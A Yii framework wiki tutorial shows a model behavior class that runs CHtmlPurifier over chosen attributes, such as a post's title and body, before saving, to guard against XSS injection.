XSS safe model content

You are viewing revision #1 of this wiki article.
This is the latest version of this article.

In this post I am going to describe a solution to make your yii-based web application safe from illegal content injections.

I am going to make a use of the the yii wrapped htmlpurifier class inside a behavior. this behavior could be attached to any model with declaring the attributes we would like to make them XSS safe.

I have wrote the following behavior :

class CSafeContentBehavior extends CActiveRecordBehavior
{
	public $attributes =array();
	protected $purifier;
	
	function __construct(){
		$this->purifier = new CHtmlPurifier;
	}
	
    public function beforeSave($event)
    {
		foreach($this->attributes as $attribute){
			$this->getOwner()->{$attribute} = $this->purifier->purify($this->getOwner()->{$attribute});
		}
    }
}

place this class in a file in your application directory, for example : application/behaviors/CSafeContentBehavior.php Now in your model you attach the behavior like this :

class Post extends CActiveRecord
{

public function behaviors(){
	return array(
		'CSafeContentBehavor' => array( 
			'class' => 'application.behaviors.CSafeContentBehavior',
			'attributes' => array('title', 'body'),
		),
	);
}

Here we go. Our Post model will now purify title and body columns before each save operation.

4 0
1 follower
Viewed: 13 104 times
Version: Unknown (update)
Category: Tutorials
Tags:
Written by: phiras
Last updated by: phiras
Created on: Feb 25, 2010
Last updated: 14 years ago
Update Article

Revisions

View all history